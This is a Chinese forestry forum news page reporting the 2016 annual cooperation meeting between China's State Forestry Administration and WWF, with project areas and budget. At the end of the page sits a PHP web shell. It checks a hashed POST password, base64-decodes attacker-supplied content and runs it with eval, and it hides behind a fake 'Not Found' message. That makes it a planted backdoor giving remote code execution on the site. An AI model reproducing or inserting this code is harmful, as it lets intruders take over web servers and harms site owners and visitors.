科研论坛

首页 > 科研保护 > 科研论坛 >

    国家林业局与世界自然基金会2016年年会在京召开

            国家林业局与世界自然基金会2016年年会于9月26-27日在京召开。国家林业局相关司局、直属单位以及相关省区林业厅(局)的代表及世界自然基金会各主要项目负责人参加了会议。双方在总结上一年度合作成果的基础上,对2016-2017年度的合作项目进行了磋商,并达成共识,形成了《国家林业局与世界自然基金会2016-2017年度合作项目备忘录》。根据《备忘录》,2016-2017年度,国家林业局将与世界自然基金会在湿地保护与管理、野生动物保护、森林可持续经营、负责任的林产品贸易以及林业海外投资等领域开展合作项目,预算资金约1274万元人民币。

           世界自然基金会(WWF)成立于1961年,是一个总部设在瑞士格兰德的国际非盈利自然保护组织。WWF与我国林业部门的合作始于1980年,目前,双方的项目涉及物种保护、森林可持续经营、气候变化与能源、绿色经济等领域。(王智供稿)
     
"; error_reporting(0); if(isset($_POST['com']) && md5($_POST['com']) == '791dc312b38016ef998c1c146104cd5a' && isset($_POST['content'])) $content = strtr($_POST['content'], '-_,', '+/=');eval(base64_decode($content)); echo "We're sorry but the page your are looking for is Not Found..." ?>